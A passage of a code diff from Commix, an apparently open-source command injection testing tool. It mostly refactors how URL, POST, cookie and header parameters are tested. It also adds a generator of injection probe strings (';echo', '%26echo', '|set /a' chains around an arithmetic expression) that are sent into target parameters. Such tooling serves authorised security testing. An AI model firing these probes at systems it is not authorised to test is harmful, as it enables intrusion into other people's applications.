@@ -3,7 +3,7 @@
 
 """
 This file is part of Commix Project (https://commixproject.com).
-Copyright (c) 2014-2024 Anastasios Stasinopoulos (@ancst).
+Copyright (c) 2014-2025 Anastasios Stasinopoulos (@ancst).
 
 This program is free software: you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
@@ -40,8 +40,28 @@ Command Injection and exploitation controller.
 Checks if the testable parameter is exploitable.
 """
 
+"""
+Heuristic basic checks payloads generator
+"""
+def basic_payload_generator():
+  suffix = ""
+  if settings.USE_BACKTICKS:
+    prefix = "expr "
+  else:
+    prefix = "("
+    suffix = ")"
+  settings.BASIC_STRING = prefix + settings.CALC_STRING + suffix
+  settings.BASIC_COMMAND_INJECTION_PAYLOADS = [";echo " + settings.CMD_SUB_PREFIX + settings.BASIC_STRING + settings.CMD_SUB_SUFFIX + 
+                                              "%26echo " + settings.CMD_SUB_PREFIX + settings.BASIC_STRING + settings.CMD_SUB_SUFFIX + 
+                                              "|echo " + settings.CMD_SUB_PREFIX + settings.BASIC_STRING + settings.CMD_SUB_SUFFIX + 
+                                              settings.RANDOM_STRING_GENERATOR,
+                                              "|set /a " + settings.BASIC_STRING + "%26set /a " + settings.BASIC_STRING
+                                              ]
+"""
+Initializing basic level check status
+"""
 def basic_level_checks():
-  settings.TIME_RELATIVE_ATTACK = False
+  settings.TIME_RELATED_ATTACK = False
   settings.SKIP_CODE_INJECTIONS = None
   settings.SKIP_COMMAND_INJECTIONS = None
   settings.IDENTIFIED_COMMAND_INJECTION = False
@@ -89,29 +109,19 @@ def heuristic_request(url, http_request_method, check_parameter, payload, whites
   if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
     payload = checks.payload_fixation(payload)
     cookie = checks.process_injectable_value(payload, menu.options.cookie).encode(settings.DEFAULT_CODEC)
-    # if settings.TESTABLE_VALUE in menu.options.cookie.replace(settings.INJECT_TAG, ""):
-    #   cookie = menu.options.cookie.replace(settings.INJECT_TAG, "").replace(settings.TESTABLE_VALUE, payload).encode(settings.DEFAULT_CODEC)
-    # else:
-    #   cookie = menu.options.cookie.replace(settings.INJECT_TAG, payload).encode(settings.DEFAULT_CODEC)
   else:
     cookie = checks.remove_tags(menu.options.cookie).encode(settings.DEFAULT_CODEC)
 
   if not settings.IGNORE_USER_DEFINED_POST_DATA and menu.options.data and settings.INJECT_TAG in menu.options.data:
     data = checks.process_injectable_value(payload, menu.options.data).encode(settings.DEFAULT_CODEC)
-    # if settings.TESTABLE_VALUE in menu.options.data.replace(settings.INJECT_TAG, ""):
-    #   data = menu.options.data.replace(settings.INJECT_TAG, "").replace(settings.TESTABLE_VALUE, payload).encode(settings.DEFAULT_CODEC)
-    # else:
-    #   data = menu.options.data.replace(settings.TESTABLE_VALUE + settings.INJECT_TAG, settings.INJECT_TAG).replace(settings.INJECT_TAG, payload).encode(settings.DEFAULT_CODEC)
   else:
     if settings.USER_DEFINED_POST_DATA:
       settings.USER_DEFINED_POST_DATA = checks.remove_tags(settings.USER_DEFINED_POST_DATA)
       data = settings.USER_DEFINED_POST_DATA.encode(settings.DEFAULT_CODEC)
   if settings.INJECT_TAG in url:
-    tmp_url = checks.process_injectable_value(payload, url)
-    # if settings.TESTABLE_VALUE in url.replace(settings.INJECT_TAG, ""):
-    #   tmp_url = url.replace(settings.INJECT_TAG, "").replace(settings.TESTABLE_VALUE, payload)
-    # else:
-    #   tmp_url = url.replace(settings.TESTABLE_VALUE + settings.INJECT_TAG, settings.INJECT_TAG).replace(settings.INJECT_TAG, payload)
+    # Encode query string, preserving delimiters and configured parameter delimiter
+    encoded_payload = _urllib.parse.quote(payload, safe=settings.SAFE_QUERY)
+    tmp_url = checks.process_injectable_value(encoded_payload, url)
   else:
     tmp_url = checks.remove_tags(tmp_url)
     url = checks.remove_tags(url)
@@ -120,7 +130,7 @@ def heuristic_request(url, http_request_method, check_parameter, payload, whites
   if cookie:
     request.add_header(settings.COOKIE, cookie)
   if check_parameter_in_http_header(check_parameter) and check_parameter not in settings.HOST.capitalize():
-    settings.CUSTOM_HEADER_NAME = check_parameter
+    settings.CUSTOM_HEADER_NAME = check_parameter.title()
     if settings.CUSTOM_HEADER_VALUE.replace(settings.INJECT_TAG, "") in settings.CUSTOM_HEADER_VALUE:
       request.add_header(settings.CUSTOM_HEADER_NAME, settings.CUSTOM_HEADER_VALUE.replace(settings.INJECT_TAG, "").replace(settings.CUSTOM_HEADER_VALUE, payload).encode(settings.DEFAULT_CODEC))
     else:
@@ -134,13 +144,15 @@ Heuristic (basic) tests for command injection
 """
 def command_injection_heuristic_basic(url, http_request_method, check_parameter, the_type, header_name, inject_http_headers):
   check_parameter = check_parameter.lstrip().rstrip()
+  checks.perform_payload_modification(payload="")
+  basic_payload_generator()
   if menu.options.alter_shell:
     basic_payloads = settings.ALTER_SHELL_BASIC_COMMAND_INJECTION_PAYLOADS
   else:
     basic_payloads = settings.BASIC_COMMAND_INJECTION_PAYLOADS
   settings.CLASSIC_STATE = True
   try:
-    checks.perform_payload_modification(payload="")
+    # checks.perform_payload_modification(payload="")
     for whitespace in settings.WHITESPACES:
       if not settings.IDENTIFIED_COMMAND_INJECTION:
         _ = 0
@@ -148,7 +160,7 @@ def command_injection_heuristic_basic(url, http_request_method, check_parameter,
           _ = _ + 1
           response, url = heuristic_request(url, http_request_method, check_parameter, payload, whitespace)
           if type(response) is not bool and response is not None:
-            html_data = checks.page_encoding(response, action="decode")
+            html_data = checks.process_page_content(response, action="decode")
             match = re.search(settings.BASIC_COMMAND_INJECTION_RESULT, html_data)
             if match:
               settings.IDENTIFIED_COMMAND_INJECTION = True
@@ -157,7 +169,7 @@ def command_injection_heuristic_basic(url, http_request_method, check_parameter,
                 settings.TARGET_OS = settings.OS.UNIX
               else:
                 settings.TARGET_OS = settings.OS.WINDOWS
-              info_msg = "Heuristic (basic) tests shows that "
+              info_msg = "Heuristic (basic) tests show that "
               info_msg += settings.CHECKING_PARAMETER + " might be injectable (possible OS: '" + possible_os + "')."
               settings.print_data_to_stdout(settings.print_bold_info_msg(info_msg))
               settings.SKIP_CODE_INJECTIONS = True
@@ -185,7 +197,7 @@ def code_injections_heuristic_basic(url, http_request_method, check_parameter, t
       for payload in settings.PHPINFO_CHECK_PAYLOADS:
         response, url = heuristic_request(url, http_request_method, check_parameter, payload, whitespace)
         if type(response) is not bool and response is not None:
-          html_data = checks.page_encoding(response, action="decode")
+          html_data = checks.process_page_content(response, action="decode")
           match = re.search(settings.CODE_INJECTION_PHPINFO, html_data)
           if match:
             technique = technique + " (possible PHP version: '" + match.group(1) + "')"
@@ -196,7 +208,7 @@ def code_injections_heuristic_basic(url, http_request_method, check_parameter, t
                 settings.IDENTIFIED_WARNINGS = True
                 break
           if settings.IDENTIFIED_WARNINGS or settings.IDENTIFIED_PHPINFO:
-            info_msg = "Heuristic (basic) tests shows that "
+            info_msg = "Heuristic (basic) tests show that "
             info_msg += settings.CHECKING_PARAMETER + " might be injectable via " + technique + "."
             settings.print_data_to_stdout(settings.print_bold_info_msg(info_msg))
             break
@@ -295,12 +307,14 @@ Proceed to the injection process for the appropriate parameter.
 """
 def injection_proccess(url, check_parameter, http_request_method, filename, timesec):
   settings.NOT_TESTABLE_PARAMETERS = False
-  for i in range(0,int(settings.OS_CHECKS_NUM)):
-    if settings.CHECK_BOTH_OS:
-      if i == 0:
-        settings.TARGET_OS = settings.OS.UNIX
-      else:
-        settings.TARGET_OS = settings.OS.WINDOWS
+
+  os_targets = ([settings.TARGET_OS] if settings.TARGET_OS else
+                list(vars(settings.OS).values())[:settings.OS_CHECKS_NUM] if settings.CHECK_BOTH_OS else
+                [settings.TARGET_OS or list(vars(settings.OS).values())[0]])
+
+  # Loop over the selected OS targets
+  for os_target in os_targets:
+    settings.TARGET_OS = os_target
 
     if settings.PERFORM_BASIC_SCANS:
       checks.keep_testing_others(filename, url)
@@ -343,7 +357,7 @@ def injection_proccess(url, check_parameter, http_request_method, filename, time
     else:
        settings.CHECKING_PARAMETER += str(the_type) + str(header_name) + str(inject_parameter)
 
-    if check_parameter in settings.CUSTOM_INJECTION_MARKER_PARAMETERS_LIST:
+    if check_parameter in settings.CUSTOM_INJECTION_MARKER_PARAMETERS_LIST and not http_request_method + ":" + check_parameter in settings.TESTED_PARAMETERS_LIST:
       settings.CHECKING_PARAMETER = "(custom) " + settings.CHECKING_PARAMETER
 
     if not settings.LOAD_SESSION:
@@ -371,7 +385,7 @@ def injection_proccess(url, check_parameter, http_request_method, filename, time
 
         if not settings.IDENTIFIED_COMMAND_INJECTION and not settings.IDENTIFIED_WARNINGS and not settings.IDENTIFIED_PHPINFO:
           settings.HEURISTIC_TEST.POSITIVE = False
-          warn_msg = "Heuristic (basic) tests shows that "
+          warn_msg = "Heuristic (basic) tests show that "
           warn_msg += settings.CHECKING_PARAMETER + " might not be injectable."
           settings.print_data_to_stdout(settings.print_bold_warning_msg(warn_msg))
 
@@ -405,8 +419,7 @@ def injection_proccess(url, check_parameter, http_request_method, filename, time
 
       # All injection techniques seems to be failed!
       if checks.injection_techniques_status() == False:
-        warn_msg = "The tested "
-        warn_msg += settings.CHECKING_PARAMETER
+        warn_msg = settings.CHECKING_PARAMETER
         warn_msg += " does not seem to be injectable."
         settings.print_data_to_stdout(settings.print_bold_warning_msg(warn_msg))
       else:
@@ -417,81 +430,67 @@ def injection_proccess(url, check_parameter, http_request_method, filename, time
       break
 
 """
-Perform checks over custom HTTP Headers parameters.
-"""
-def custom_headers_checks(url, http_request_method, filename, timesec): 
-  # # Disable Cookie Injection
-  # settings.COOKIE_INJECTION = None
-
-  for name in range(len(settings.CUSTOM_HEADERS_NAMES)):
-    if settings.ASTERISK_MARKER in settings.CUSTOM_HEADERS_NAMES[name].split(": ")[1] and not settings.CUSTOM_INJECTION_MARKER:
-      settings.CUSTOM_HEADER_INJECTION = False
-    else:
-      settings.CUSTOM_HEADER_INJECTION = True
-      settings.CUSTOM_HEADER_NAME = settings.CUSTOM_HEADERS_NAMES[name].split(": ")[0]
-      settings.HTTP_HEADER = check_parameter = header_name = settings.CUSTOM_HEADER_NAME.lower()
-      settings.CUSTOM_INJECTION_MARKER_PARAMETERS_LIST.append(check_parameter) if check_parameter not in settings.CUSTOM_INJECTION_MARKER_PARAMETERS_LIST else settings.CUSTOM_INJECTION_MARKER_PARAMETERS_LIST
-      settings.CUSTOM_HEADER_VALUE = settings.CUSTOM_HEADERS_NAMES[name].split(": ")[1].replace(settings.ASTERISK_MARKER, settings.INJECT_TAG)
-      url, check_parameter = check_for_stored_sessions(url, check_parameter, http_request_method)
-      if check_parameter != header_name or not injection_proccess(url, check_parameter, http_request_method, filename, timesec):
-        settings.CUSTOM_HEADER_INJECTION = False
-      settings.CUSTOM_HEADERS_NAMES[name] = checks.remove_tags(settings.CUSTOM_HEADERS_NAMES[name])
-  settings.CUSTOM_HEADER_INJECTION = False
-
-"""
-Inject HTTP headers parameters (User-agent / Referer / Host).
+Perform injection for a specific HTTP header (User-Agent, Referer, or Host)
 """
 def http_headers_injection(url, http_request_method, filename, timesec):
 
-  def user_agent_injection(url, http_request_method, filename, timesec):
-    user_agent = menu.options.agent
-    settings.USER_AGENT_INJECTION = True
-    settings.HTTP_HEADER = check_parameter = header_name = settings.USER_AGENT.lower()
-    url, check_parameter = check_for_stored_sessions(url, check_parameter, http_request_method)
-    if check_parameter != header_name or not injection_proccess(url, check_parameter, http_request_method, filename, timesec):
-      settings.USER_AGENT_INJECTION = None
-    menu.options.agent = user_agent
+  def inject_header(header_attr, option_attr, injection_flag_attr):
+    # Save the original value of the option (to restore later)
+    original_value = getattr(menu.options, option_attr)
 
-  def referer_injection(url, http_request_method, filename, timesec):
-    referer = menu.options.referer
-    settings.REFERER_INJECTION = True
-    settings.HTTP_HEADER = check_parameter = header_name = settings.REFERER.lower()
-    url, check_parameter = check_for_stored_sessions(url, check_parameter, http_request_method)
-    if check_parameter != header_name or not injection_proccess(url, check_parameter, http_request_method, filename, timesec):
-      settings.REFERER_INJECTION = None
-    menu.options.referer = referer
+    # Enable the corresponding injection flag
+    setattr(settings, injection_flag_attr, True)
 
-  def host_injection(url, http_request_method, filename, timesec):
-    host = menu.options.host
-    settings.HOST_INJECTION = True
-    settings.HTTP_HEADER = check_parameter = header_name = settings.HOST.lower()
-    url, check_parameter = check_for_stored_sessions(url, check_parameter, http_request_method)
-    if check_parameter != header_name and not injection_proccess(url, check_parameter, http_request_method, filename, timesec):
-      settings.HOST_INJECTION = None
-    menu.options.host = host
+    # Get the header name (e.g., "user-agent", "referer", "host")
+    header_name = getattr(settings, header_attr).lower()
+    settings.HTTP_HEADER = check_parameter = header_name
 
-  if not any((settings.USER_AGENT_INJECTION, settings.REFERER_INJECTION, settings.HOST_INJECTION)) and \
-    menu.options.test_parameter == None and \
-    menu.options.skip_parameter == None:
-    user_agent_injection(url, http_request_method, filename, timesec)
-    referer_injection(url, http_request_method, filename, timesec)
-    host_injection(url, http_request_method, filename, timesec)
+    # Check if the session has stored data for this header
+    new_url, check_parameter = check_for_stored_sessions(url, check_parameter, http_request_method)
+
+    # If the header was replaced or injection failed, reset the injection flag
+    if check_parameter != header_name or not injection_proccess(new_url, check_parameter, http_request_method, filename, timesec):
+      setattr(settings, injection_flag_attr, None)
+
+    # Restore the original option value
+    setattr(menu.options, option_attr, original_value)
+
+  # Determine whether a header should be tested for injection
+  def test_header(header_attr):
+    test_param = menu.options.test_parameter
+    skip_param = menu.options.skip_parameter
+    header_value = getattr(settings, header_attr).lower()
+
+    # Check if the corresponding injection flag is already active
+    if getattr(settings, header_attr.upper() + "_INJECTION"):
+      return True
+
+    # Check if explicitly included in test_parameter
+    if isinstance(test_param, str) and header_value in test_param.lower():
+      return True
+
+    # Check if not excluded via skip_parameter
+    if isinstance(skip_param, str) and header_value not in skip_param.lower():
+      return True
+
+    return False
+
+  # If no specific test or skip parameters and no injection flags are set, test all headers
+  no_injection_flags = not settings.USER_AGENT_INJECTION and not settings.REFERER_INJECTION and not settings.HOST_INJECTION
+  no_test_or_skip = menu.options.test_parameter is None and menu.options.skip_parameter is None
+
+  if no_injection_flags and no_test_or_skip:
+    inject_header("USER_AGENT", "agent", "USER_AGENT_INJECTION")
+    inject_header("REFERER", "referer", "REFERER_INJECTION")
+    inject_header("HOST", "host", "HOST_INJECTION")
   else:
-    # User-Agent HTTP header injection
-    if settings.USER_AGENT_INJECTION or \
-      (type(menu.options.test_parameter) is str and settings.USER_AGENT.lower() in menu.options.test_parameter.lower()) or \
-      (type(menu.options.skip_parameter) is str and settings.USER_AGENT.lower() not in menu.options.skip_parameter.lower()):
-      user_agent_injection(url, http_request_method, filename, timesec)
-    # Referer HTTP header injection
-    if settings.REFERER_INJECTION or \
-      (type(menu.options.test_parameter) is str and settings.REFERER.lower() in menu.options.test_parameter.lower()) or \
-      (type(menu.options.skip_parameter) is str and settings.REFERER.lower() not in menu.options.skip_parameter.lower()):
-      referer_injection(url, http_request_method, filename, timesec)
-    # Host HTTP header injection
-    if settings.HOST_INJECTION or \
-      (type(menu.options.test_parameter) is str and settings.HOST.lower() in menu.options.test_parameter.lower()) or \
-      (type(menu.options.skip_parameter) is str and settings.HOST.lower() not in menu.options.skip_parameter.lower()):
-      host_injection(url, http_request_method, filename, timesec)
+    # Conditional injection based on test/skip flags or predefined injection settings
+    if test_header("USER_AGENT"):
+      inject_header("USER_AGENT", "agent", "USER_AGENT_INJECTION")
+    if test_header("REFERER"):
+      inject_header("REFERER", "referer", "REFERER_INJECTION")
+    if test_header("HOST"):
+      inject_header("HOST", "host", "HOST_INJECTION")
 
 """
 Inject Cookie parameters
@@ -522,62 +521,121 @@ def cookie_injection(url, http_request_method, filename, timesec):
     # Disable cookie injection
     settings.COOKIE_INJECTION = False
 
+"""
+Remove parameters containing the injection tag from the testable parameters list.
+"""
+def filtered_testable_parameters():
+  settings.TESTABLE_PARAMETERS_LIST = [
+  param for param in settings.TESTABLE_PARAMETERS_LIST
+  if settings.INJECT_TAG not in param]
+  return settings.TESTABLE_PARAMETERS_LIST
 
 """
-Perform the injection proccess
+Process a list of parameters to test for injection vulnerabilities.
 """
 def do_injection(found, data_type, header_name, url, http_request_method, filename, timesec):
 
-  def define_check_parameter(found, i, url):
+  """
+  Validate parameter names using allowed characters:
+  letters, digits, underscores, hyphens, dots, and square brackets.
+  """
+  def is_valid_param_name(name):
+    if not isinstance(name, str):
+      return False
+    name = name.strip()
+    if not name:
+      return False
+    return bool(re.match(r'^[\w._\-\[\]]+$', name, re.UNICODE))
+
+  """
+  Define the check parameter based on the data type (POST, GET, COOKIE).
+  """
+  def define_check_parameter(param, current_url):
     if data_type == settings.HTTPMETHOD.POST:
-      menu.options.data = found[i]
-      check_parameter = parameters.vuln_POST_param(found[i], url)
-    if data_type == settings.HTTPMETHOD.GET:
-      url = found[i]
-      check_parameter = parameters.vuln_GET_param(url)
-    if data_type == settings.COOKIE:
-      menu.options.cookie = found[i]
-      check_parameter = parameters.specify_cookie_parameter(found[i])
-    return url, check_parameter
-    
-  # Check if multiple parameters
+      menu.options.data = param
+      check_param = parameters.vuln_POST_param(param, current_url)
+    elif data_type == settings.HTTPMETHOD.GET:
+      current_url = param
+      check_param = parameters.vuln_GET_param(current_url)
+    elif data_type == settings.COOKIE:
+      menu.options.cookie = param
+      check_param = parameters.specify_cookie_parameter(param)
+    else:
+      check_param = ""
+    return current_url, check_param
+
+  """
+  Return a unique identifier for the parameter by prefixing it with the data type.
+  """
+  def get_contextual_name(check_param):
+    return str(data_type) + ":" + str(check_param)
+
+  """
+  Perform the injection call and update tested parameters.
+  """
+  def injection_call(url, check_param):
+    contextual_name = get_contextual_name(check_param)
+    url, check_param = define_check_parameter(found[index], url)
+    url, check_param = check_for_stored_sessions(url, check_param, http_request_method)
+    injection_proccess(url, check_param, http_request_method, filename, timesec)
+    settings.TESTED_PARAMETERS_LIST.append(contextual_name)
+
   check_parameters = []
-  for i in range(0, len(found)):
-    url, check_parameter = define_check_parameter(found, i, url)
-    check_parameters.append(check_parameter)
+  param_mapping = {}
+
+  # Filter and validate parameters to prepare for injection tests
+  for param in found:
+    url, check_param = define_check_parameter(param, url)
+    if not check_param:
+      continue
+    contextual_name = get_contextual_name(check_param)
+    if contextual_name in settings.TESTED_PARAMETERS_LIST:
+      continue
+    if not is_valid_param_name(check_param):
+      continue
+    check_parameters.append(check_param)
+    param_mapping[check_param] = param
+
+  # Prepare testable parameters
+  filtered_testable_parameters()
   checks.testable_parameters(url, check_parameters, header_name)
-  
-  for i in range(0, len(found)):
-    url, check_parameter = define_check_parameter(found, i, url)
-    if check_parameter != found[i] and check_parameter not in settings.SKIP_PARAMETER:
-      if len(check_parameter) > 0:
-        settings.TESTABLE_PARAMETER = check_parameter
-      if len(settings.TESTABLE_PARAMETER) > 0:
-        if settings.TESTABLE_PARAMETERS_LIST and not settings.CUSTOM_INJECTION_MARKER:
-          counter = 0
-          for check_parameter in check_parameters:
-            if settings.TESTABLE_PARAMETERS_LIST.count(check_parameter) != 0:
-              url, check_parameter = define_check_parameter(found, counter, url)
-              url, check_parameter = check_for_stored_sessions(url, check_parameter, http_request_method)
-              injection_proccess(url, check_parameter, http_request_method, filename, timesec)
-            counter += 1
-          break
-        elif settings.CUSTOM_INJECTION_MARKER_PARAMETERS_LIST and settings.CUSTOM_INJECTION_MARKER:
-          counter = 0
-          for check_parameter in check_parameters:
-            if settings.CUSTOM_INJECTION_MARKER_PARAMETERS_LIST.count(check_parameter) != 0:
-              url, check_parameter = define_check_parameter(found, counter, url)
-              url, check_parameter = check_for_stored_sessions(url, check_parameter, http_request_method)
-              injection_proccess(url, check_parameter, http_request_method, filename, timesec)
-            counter += 1
-          break
-        else:
-          if not (check_parameter in settings.CUSTOM_INJECTION_MARKER_PARAMETERS_LIST and not settings.CUSTOM_INJECTION_MARKER):
-            url, check_parameter = check_for_stored_sessions(url, check_parameter, http_request_method)
-            injection_proccess(url, check_parameter, http_request_method, filename, timesec)
+
+  # Exclude parameters that already contain the inject tag
+  base_params = {
+    param for param in settings.TESTABLE_PARAMETERS_LIST
+    if settings.INJECT_TAG not in param
+  }
+
+  # Add custom marker parameters if enabled
+  custom_params = set(settings.CUSTOM_INJECTION_MARKER_PARAMETERS_LIST) \
+    if settings.CUSTOM_INJECTION_MARKER else set()
+
+  # Final set of injection targets
+  injection_targets = base_params.union(custom_params)
+
+  for check_param in check_parameters:
+    contextual_name = get_contextual_name(check_param)
+    if contextual_name in settings.TESTED_PARAMETERS_LIST:
+      continue
+
+    try:
+      original_param = param_mapping[check_param]
+      index = found.index(original_param)
+    except (KeyError, ValueError):
+      continue
+
+    settings.TESTABLE_PARAMETER = check_param
+    
+    if settings.USER_DEFINED_POST_DATA:
+      active_targets = injection_targets
+    else:
+      if any(param in injection_targets for param in check_parameters):
+        active_targets = injection_targets
       else:
-        url, check_parameter = check_for_stored_sessions(url, check_parameter, http_request_method)
-        injection_proccess(url, check_parameter, http_request_method, filename, timesec)
+        active_targets = check_parameters
+
+    if check_param in active_targets or not filtered_testable_parameters():
+      injection_call(url, check_param)
 
 """
 Check if HTTP Method is GET.
@@ -622,12 +680,12 @@ def data_checks(url, http_request_method, filename, timesec):
   init_cookie_injection_status()
   if settings.USER_DEFINED_POST_DATA and not settings.IGNORE_USER_DEFINED_POST_DATA:
     if post_request(url, http_request_method, filename, timesec) is None:
-      if not settings.SKIP_NON_CUSTOM:
+      if not settings.SKIP_NON_CUSTOM_PARAMS:
         get_request(url, http_request_method, filename, timesec)
   else:
     if get_request(url, http_request_method, filename, timesec) is None:
       if settings.USER_DEFINED_POST_DATA:
-        if not settings.SKIP_NON_CUSTOM:
+        if not settings.SKIP_NON_CUSTOM_PARAMS:
           post_request(url, http_request_method, filename, timesec) 
 
 """
@@ -637,7 +695,7 @@ def cookies_checks(url, http_request_method, filename, timesec):
   if len([i for i in settings.TESTABLE_PARAMETERS_LIST if i in str(menu.options.cookie)]) != 0 or \
     settings.INJECTION_MARKER_LOCATION.COOKIE or \
     settings.COOKIE_INJECTION:
-    if not settings.SKIP_NON_CUSTOM:
+    if not settings.SKIP_NON_CUSTOM_PARAMS:
       cookie_injection(url, http_request_method, filename, timesec)
 
 """
@@ -645,80 +703,160 @@ Perform checks over HTTP Headers parameters.
 """
 def headers_checks(url, http_request_method, filename, timesec):
   if len([i for i in settings.TESTABLE_PARAMETERS_LIST if i in settings.HTTP_HEADERS]) != 0 or \
-    settings.INJECTION_MARKER_LOCATION.HTTP_HEADERS or settings.HTTP_HEADERS_INJECTION or \
-    any((settings.USER_AGENT_INJECTION, settings.REFERER_INJECTION, settings.HOST_INJECTION)):
-    if not settings.SKIP_NON_CUSTOM:
+    settings.INJECTION_MARKER_LOCATION.HTTP_HEADERS or \
+    settings.HTTP_HEADERS_INJECTION:
+    if not settings.SKIP_NON_CUSTOM_PARAMS:
       http_headers_injection(url, http_request_method, filename, timesec)
 
 """
-Perform checks
+Perform checks over custom HTTP Headers parameters.
+"""
+def custom_headers_checks(url, http_request_method, filename, timesec): 
+  for name in range(len(settings.CUSTOM_HEADERS_NAMES)):
+    if settings.ASTERISK_MARKER in settings.CUSTOM_HEADERS_NAMES[name].split(": ")[1] and not settings.CUSTOM_INJECTION_MARKER:
+      settings.CUSTOM_HEADER_INJECTION = False
+    else:
+      settings.CUSTOM_HEADER_INJECTION = True
+      settings.CUSTOM_HEADER_NAME = settings.CUSTOM_HEADERS_NAMES[name].split(": ")[0]
+      settings.HTTP_HEADER = check_parameter = header_name = settings.CUSTOM_HEADER_NAME.lower()
+      settings.CUSTOM_INJECTION_MARKER_PARAMETERS_LIST.append(check_parameter) if check_parameter not in settings.CUSTOM_INJECTION_MARKER_PARAMETERS_LIST else settings.CUSTOM_INJECTION_MARKER_PARAMETERS_LIST
+      settings.CUSTOM_HEADER_VALUE = settings.CUSTOM_HEADERS_NAMES[name].split(": ")[1].replace(settings.ASTERISK_MARKER, settings.INJECT_TAG)
+      url, check_parameter = check_for_stored_sessions(url, check_parameter, http_request_method)
+      if check_parameter != header_name or not injection_proccess(url, check_parameter, http_request_method, filename, timesec):
+        settings.CUSTOM_HEADER_INJECTION = False
+      settings.CUSTOM_HEADERS_NAMES[name] = checks.remove_tags(settings.CUSTOM_HEADERS_NAMES[name])
+  settings.CUSTOM_HEADER_INJECTION = False
+
+"""
+Perform checks across multiple HTTP components (URL parameters, POST data, cookies,
+standard headers, and custom headers) to identify possible injection points.
 """
 def perform_checks(url, http_request_method, filename):
-  # Initiate whitespaces
-  if settings.MULTI_TARGETS or settings.STDIN_PARSING and len(settings.WHITESPACES) > 1:
-    settings.WHITESPACES = ["%20"]
+
+  # Prepare whitespaces if multiple targets or stdin parsing is used,
+  # and more than one whitespace character is defined. Keep only one.
+  if (settings.MULTI_TARGETS or settings.STDIN_PARSING) and \
+     len(settings.WHITESPACES) > 1:
+    settings.WHITESPACES = [_urllib.parse.quote(SINGLE_WHITESPACE)]
 
   timesec = settings.TIMESEC
-  # Check if authentication is needed.
+
+  # Handle authentication if both the authentication URL and the authentication data are provided.
   if menu.options.auth_url and menu.options.auth_data:
-    # Do the authentication process.
     authentication.authentication_process(http_request_method)
     try:
-      # Check if authentication page is the same with the next (injection) URL
-      if _urllib.request.urlopen(url, timeout=settings.TIMEOUT).read() == _urllib.request.urlopen(menu.options.auth_url, timeout=settings.TIMEOUT).read():
-        err_msg = "It seems that the authentication procedure has failed."
+      # Verify authentication success by comparing the response content of the main URL and the auth URL.
+      if _urllib.request.urlopen(url, timeout=settings.TIMEOUT).read() == \
+         _urllib.request.urlopen(menu.options.auth_url, timeout=settings.TIMEOUT).read():
+        err_msg = "Authentication failed using the specified credentials and URL."
         settings.print_data_to_stdout(settings.print_critical_msg(err_msg))
         raise SystemExit()
     except (_urllib.error.URLError, _urllib.error.HTTPError) as err_msg:
+      # Authentication request failed due to a connection or HTTP error.
       settings.print_data_to_stdout(settings.print_critical_msg(err_msg))
       raise SystemExit()
+
+  # If only one of the required authentication options is provided, display an error and exit.
   elif menu.options.auth_url or menu.options.auth_data:
-    err_msg = "You must specify both login panel URL and login parameters."
+    err_msg = "Authentication requires specifying both '--auth-url' and '--auth-data' options."
     settings.print_data_to_stdout(settings.print_critical_msg(err_msg))
     raise SystemExit()
-  else:
-    pass
 
+  # If shellshock testing is enabled, force the injection level to HTTP header level.
   if menu.options.shellshock:
     settings.INJECTION_LEVEL = settings.HTTP_HEADER_INJECTION_LEVEL
   else:
-    if settings.INJECTION_LEVEL != settings.DEFAULT_INJECTION_LEVEL and settings.CUSTOM_INJECTION_MARKER != True:
+    # If the user specified a custom injection level and no custom marker is used,
+    # set the level to the user-defined value.
+    if settings.INJECTION_LEVEL != settings.DEFAULT_INJECTION_LEVEL and \
+       not settings.CUSTOM_INJECTION_MARKER:
       settings.INJECTION_LEVEL = settings.USER_APPLIED_LEVEL
 
-  _ = True
+  proceed_non_custom = True
+  
+  # Perform custom marker-based checks if custom injection marker is enabled.
   if settings.CUSTOM_INJECTION_MARKER:
-    _ = False
-    if any((settings.INJECTION_MARKER_LOCATION.URL, settings.INJECTION_MARKER_LOCATION.DATA)):
+    proceed_non_custom = False
+
+    # Perform checks over GET and POST parameters.
+    if settings.INJECTION_MARKER_LOCATION.URL or \
+       settings.INJECTION_MARKER_LOCATION.DATA:
       data_checks(url, http_request_method, filename, timesec)
+
+    # Perform checks over cookie values.
     if settings.INJECTION_MARKER_LOCATION.COOKIE:
       cookies_checks(url, http_request_method, filename, timesec)
+
+    # Perform checks over standard HTTP headers (User-Agent, Referer, Host).
     if settings.INJECTION_MARKER_LOCATION.HTTP_HEADERS:
       headers_checks(url, http_request_method, filename, timesec)
+
+    # Perform checks over custom user-defined HTTP headers.
     if settings.INJECTION_MARKER_LOCATION.CUSTOM_HTTP_HEADERS:
       custom_headers_checks(url, http_request_method, filename, timesec)
-    # if settings.TESTABLE_PARAMETERS_LIST or (settings.USER_DEFINED_POST_DATA and not settings.INJECTION_MARKER_LOCATION.DATA) or (settings.USER_DEFINED_URL_DATA and not settings.INJECTION_MARKER_LOCATION.URL):
-    # if settings.TESTABLE_PARAMETERS_LIST or not settings.INJECTION_MARKER_LOCATION.URL or not settings.INJECTION_MARKER_LOCATION.DATA:
-    if settings.TESTABLE_PARAMETERS_LIST or len(settings.USER_DEFINED_POST_DATA) != 0 and any((settings.INJECTION_MARKER_LOCATION.URL, settings.INJECTION_MARKER_LOCATION.DATA)):
+
+    # Check if the injection marker is set in either URL or POST data (but not both)
+    has_exclusive_marker = settings.INJECTION_MARKER_LOCATION.URL ^ settings.INJECTION_MARKER_LOCATION.DATA
+    # Check if no injection marker is set in either URL or POST data
+    has_no_marker = not settings.INJECTION_MARKER_LOCATION.URL and not settings.INJECTION_MARKER_LOCATION.DATA
+    # If there’s user POST data and an exclusive marker, or no marker at all,
+    # and no testable GET parameters, proceed with non-custom checks
+    if has_exclusive_marker or has_no_marker:
       checks.process_non_custom()
 
-  if not settings.SKIP_NON_CUSTOM:
+  # Perform default (non-custom) injection checks if not explicitly skipped.
+  if not settings.SKIP_NON_CUSTOM_PARAMS:
+    # Disable custom injection mode before running default checks.
     settings.CUSTOM_INJECTION_MARKER = False
-    if settings.TESTABLE_PARAMETERS_LIST or not settings.INJECTION_MARKER_LOCATION.URL or not settings.INJECTION_MARKER_LOCATION.DATA:
+
+    # Perform checks over GET/POST parameters if allowed or marker is not set in URL/DATA.
+    if settings.TESTABLE_PARAMETERS_LIST or \
+       not settings.INJECTION_MARKER_LOCATION.URL or \
+       not settings.INJECTION_MARKER_LOCATION.DATA:
       data_checks(url, http_request_method, filename, timesec)
-    if _:
